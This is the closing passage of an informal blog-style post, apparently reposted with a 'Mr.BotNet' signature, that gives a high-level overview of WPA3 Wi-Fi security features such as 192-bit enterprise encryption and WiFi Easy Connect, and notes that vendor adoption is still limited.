๐Ÿฆ‘WPA3 when used in enterprise mode also offers the option for strong 192-bit encryption for use in high-security environments.
Etc.

๐Ÿฆ‘WPA3 also brings with it other improvements such as better onboarding methods for screenless devices (think devices such as Amazon Echos and the likes) using a process named WiFi Easy Connect, but these donโ€™t excite me as much!
Conclusion

๐Ÿฆ‘WPA3 is still pretty new in the grand scheme of things and I think it will be a while before we start to see it in widespread use. Whilst it is already available in some vendor implementations, it is not something Iโ€™ve come across yet.

๐Ÿฆ‘If youโ€™re aware of which vendors currently support WPA3 (either from client or network infrastructure perspective) then drop me a comment to let me know! Otherwise it will be interesting to see how things pan out, particularly given the early weaknesses found.

๐Ÿฆ‘Whilst not an in-depth look at WPA3, hopefully this post has helped give a bit of insight to others who, like me, somehow missed aspects of what WPA3 brings from a security perspective.

@ฬทอƒ ฬทฬMฬดอ‘rฬทฬ”.ฬธฬ” ฬถฬ„BฬดอŠoฬตอ€tฬถฬƒNฬดอ—eฬตฬtฬดฬŽ (t.m)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–